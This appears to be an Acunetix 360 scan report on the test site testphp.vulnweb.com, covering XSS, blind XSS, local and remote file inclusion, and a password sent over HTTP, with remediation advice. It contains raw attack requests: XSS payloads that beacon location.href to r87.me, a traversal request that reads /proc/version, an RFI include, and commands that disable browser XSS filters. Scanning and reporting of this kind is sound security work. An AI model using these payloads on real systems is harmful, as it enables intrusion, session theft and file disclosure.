	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: "><scRipt>netsparker(0x000009)</scRipt></li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:34:25 AM
The Issue was detected during the Scan.	System	8/29/2021 9:12:45 AM
The Issue was detected during the Scan.	System	8/27/2021 8:56:15 AM
The Issue was detected during the Scan.	System	6/9/2021 1:27:01 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:23:15 AM

Show Remediation Hide Remediation

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.

External References

Remedy References

Proof of Concept Notes

Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that;

XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than testing purposes.
Even though browsers have certain checks to prevent Cross-site scripting attacks in practice there are a variety of ways to bypass this mechanism therefore a web application should not rely on this kind of client-side browser checks.

Chrome

Open command prompt.
Go to folder where chrome.exe is located.
Run the command chrome.exe --args --disable-xss-auditor

Internet Explorer

Click Tools->Internet Options and then navigate to the Security Tab.
Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled.
Set it to disabled. Click OK.
Click Yes to accept the warning followed by Apply.

Firefox

Go to about:config in the URL address bar.
In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
Set its value to false by double clicking the row.

Safari

To disable the XSS Auditor, open Terminal and executing the command: defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool FALSE
Relaunch the browser and visit the PoC URL
Please don't forget to enable XSS auditor again: defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool TRUE

CLASSIFICATION

OWASP Top Ten 2021

A03

CVSS 3.0 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

5. Password Transmitted over HTTP

HIGH

CONFIRMED

Acunetix 360 detected that password data is being transmitted over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Vulnerabilities

5.1. http://testphp.vulnweb.com/login.php

CONFIRMED

Input Name

pass

Form target action

http://testphp.vulnweb.com/userinfo.php

Form name

loginform

Page Type

Request Response Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2060.161

Total Bytes Received : 228

Body Length : 0

Is Compressed : No


…
" action="userinfo.php">
	<table cellpadding="4" cellspacing="1">
		<tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr>
		<tr><td>Password : </td><td><input name="pass" type="password" size="20" style="width:120px;"></td></tr>
		<tr><td colspan="2" align="right"><input type="submit" value="login" style="width:75px;"></td></tr>
	</table>
	</form>
  	</div>
	<div class="story">
	<h3>
        You can also <a href="s
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:43 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:52 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:27 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:34 PM
The Issue was detected during the Scan.	System	6/9/2021 1:13:41 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:05:16 AM

Show Remediation Hide Remediation

Actions to Take

See the remedy for solution.
Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

CLASSIFICATION

OWASP Top Ten 2021

A02

CVSS 3.0 SCORE
Base	5.7 (Medium)
Temporal	5.7 (Medium)
Environmental	5.7 (Medium)

CVSS Vector String
CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	5.7 (Medium)
Temporal	5.7 (Medium)
Environmental	5.7 (Medium)

CVSS Vector String
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

6. Local File Inclusion

HIGH

CONFIRMED

Acunetix 360 identified a Local File Inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page.

Acunetix 360 confirmed this issue by reading some files from the target web server.

Impact

The impact can vary, based on the exploitation and the read permission of the web server user. Depending on these factors, an attacker might carry out one or more of the following attacks:

Gather usernames via an "/etc/passwd" file
Harvest useful information from the log files, such as "/apache/logs/error.log" or "/apache/logs/access.log"
Remotely execute commands by combining this vulnerability with some other attack vectors, such as file upload vulnerability or log injection

Vulnerabilities

6.1. http://testphp.vulnweb.com/showimage.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion&size=160

CONFIRMED

Method	Parameter	Value
GET	file	/../../../../../../../../../../proc/version
GET	size	160

Proof of Exploit

File - /proc/version

Linux version 5.4.0-1030-aws (buildd@lcy01-amd64-028) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #

Request Response Go to the highlighted output

Request

GET /showimage.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 183.5785

Total Bytes Received : 214

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:53:01 GMT

Linux version 5.4.0-1030-aws (buildd@lcy01-amd64-028) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #31-Ubuntu SMP Fri Nov 13 11:40:37 UTC 2020

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:31:19 AM
The Issue was detected during the Scan.	System	8/29/2021 9:06:39 AM
The Issue was detected during the Scan.	System	8/27/2021 8:53:03 AM
The Issue was detected during the Scan.	System	6/9/2021 1:24:27 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:15:53 AM

Show Remediation Hide Remediation

Remedy

If possible, do not permit appending file paths directly. Make them hard-coded or selectable from a limited hard-coded path list via an index variable.
If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z0-9" and do not allow ".." or "/" or "%00" (null byte) or any other similar unexpected characters.
It is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure any potential attack cannot perform a directory traversal attack.

External References

Local File Inclusion Vulnerability

CLASSIFICATION

OWASP Top Ten 2021

A01

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

7. Cross-site Scripting via Remote File Inclusion

HIGH

Acunetix 360 detected Cross-site Scripting via Remote File Inclusion, which makes it is possible to conduct cross-site scripting attacks by including arbitrary client-side dynamic scripts (JavaScript, VBScript).

Cross-site scripting allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript by the browser.

Cross-site scripting targets the users of the application instead of the server. Although this is limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:

Hijacking user's active session.
Changing the look of the page within the victim's browser.
Mounting a successful phishing attack.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

7.1. http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160

Method	Parameter	Value
GET	file	hTTp://r87.com/n
GET	size	160

Notes

Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 805.4282

Total Bytes Received : 214

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:53:03 GMT

<? print chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(69).chr(82).chr(95).chr(70).chr(48).chr(77).chr(49) ?>
<? print chr(45).(44353702950+(intval($_GET["nsxint"])*4567)).chr(45) ?>
<script>netsparkerRFI(0x066666)</script>

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:31:24 AM
The Issue was detected during the Scan.	System	8/29/2021 9:06:30 AM
The Issue was detected during the Scan.	System	8/27/2021 8:53:11 AM
The Issue was detected during the Scan.	System	6/9/2021 1:24:17 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:15:44 AM

Show Remediation Hide Remediation

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically, the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.

Additionally, you should implement a strong Content Security Policy (CSP) as a defence-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross Site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.

External References

Remedy References

CLASSIFICATION

OWASP Top Ten 2021

A03

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

8. Blind Cross-site Scripting

HIGH

CONFIRMED

Acunetix 360 detected Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:

Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

8.1. http://testphp.vulnweb.com/comment.php

CONFIRMED

Method	Parameter	Value
POST	phpaction	echo $_POST[comment];
POST	comment
POST	Submit	Submit
POST	name	<iMg src=N onerror="this.onerror='';this.src='//x1wxpcayhfc-rpk-4qkptfawolgntrjlx9qnqste'+'7xc.r87.m...

Request Response Go to the highlighted output

Request

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/comment.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

phpaction=echo+%24_POST%5bcomment%5d%3b&Submit=Submit&comment=&name=%3ciMg+src%3dN+onerror%3d%22this.onerror%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfc-rpk-4qkptfawolgntrjlx9qnqste%27%2b%277xc.r87.me%2fr%2f%3f%27%2blocation.href%22%3e

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:02:12 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:22 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:47 AM

8.2. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
POST	text	3
POST	submit	add message
POST	name	<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//x1wxpcayhfgnrlpewlo2j8crxlhcy_8f...

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

text=3&submit=add+message&name=%3ciMg+src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22+onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfgnrlpewlo2j8crxlhcy_8fsd2hnjov%27%2b%270fy.r87.me%2fr%2f%3f%27%2blocation.href%22%3e

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:55:06 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:22 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:47 AM

8.3. http://testphp.vulnweb.com/guestbook.php

CONFIRMED

Method	Parameter	Value
POST	text	<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//x1wxpcayhfqkyiwjpbyz7d8-myz46opg...
POST	submit	add message
POST	name	anonymous user

Request Response Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 242
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

text=%3ciMg+src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22+onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfqkyiwjpbyz7d8-myz46opggf9olkiw%27%2b%27-04.r87.me%2fr%2f%3f%27%2blocation.href%22%3e&submit=add+message&name=anonymous+user

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:53:09 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:48 AM

8.4. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfh_mvyem9jiu6pkg3uimc6ni-yncpmf%27%2b%27_im.r87.me%2fr%2f%3f%27%2blocation.href%22%3E&pp=12

CONFIRMED

Method	Parameter	Value
GET	p	<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//x1wxpcayhfh_mvyem9jiu6pkg3uimc6n...
GET	pp	12
GET	aaaa%2f

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=%3ciMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfh_mvyem9jiu6pkg3uimc6ni-yncpmf%27%2b%27_im.r87.me%2fr%2f%3f%27%2blocation.href%22%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:59:37 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:48 AM

8.5. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3CiMg%20src%3dN%20onerror%3d%22this.onerror%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhf38ytd-0om6dzhiuojkk6hpscxv5k_e%27%2b%27-uw.r87.me%2fr%2f%3f%27%2blocation.href%22%3E

CONFIRMED

Method	Parameter	Value
GET	p	valid
GET	pp	<iMg src=N onerror="this.onerror='';this.src='//x1wxpcayhf38ytd-0om6dzhiuojkk6hpscxv5k_e'+'-uw.r87.m...
GET	aaaa%2f

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3ciMg%20src%3dN%20onerror%3d%22this.onerror%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhf38ytd-0om6dzhiuojkk6hpscxv5k_e%27%2b%27-uw.r87.me%2fr%2f%3f%27%2blocation.href%22%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:00:53 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:46 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:22 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:47 AM

8.6. http://testphp.vulnweb.com/search.php?test=query

CONFIRMED

Method	Parameter	Value
POST	test	query
POST	searchFor	<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//x1wxpcayhfgaqbtyuyb4kwt63tz8idc6...
POST	goButton	go

Request Response Go to the highlighted output

Request

POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

searchFor=%3ciMg+src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22+onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfgaqbtyuyb4kwt63tz8idc61d1ct8ri%27%2b%27z3u.r87.me%2fr%2f%3f%27%2blocation.href%22%3e&goButton=go

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:52:39 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:47 AM

8.7. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	3
POST	uemail	<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//x1wxpcayhf1ws1fzwlc7p6yhktudtrwv...
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 321
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=4916613944329494&signup=signup&uphone=3&uemail=%3ciMg+src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22+onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhf1ws1fzwlc7p6yhktudtrwvnlbym120%27%2b%27y50.r87.me%2fr%2f%3f%27%2blocation.href%22%3e&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:00:31 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:46 AM

8.8. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	3
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	<iMg src=N onerror="this.onerror='';this.src='//x1wxpcayhfvc2hygda2ygpr4mcxlfgo2_ir7cnn5'+'05e.r87.m...

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 309
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=4916613944329494&signup=signup&uphone=3&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress=%3ciMg+src%3dN+onerror%3d%22this.onerror%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfvc2hygda2ygpr4mcxlfgo2_ir7cnn5%27%2b%2705e.r87.me%2fr%2f%3f%27%2blocation.href%22%3e

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 09:02:33 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:47 AM

8.9. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//x1wxpcayhf3veiv5nqpdh4d82hup8zvg...
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 341
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
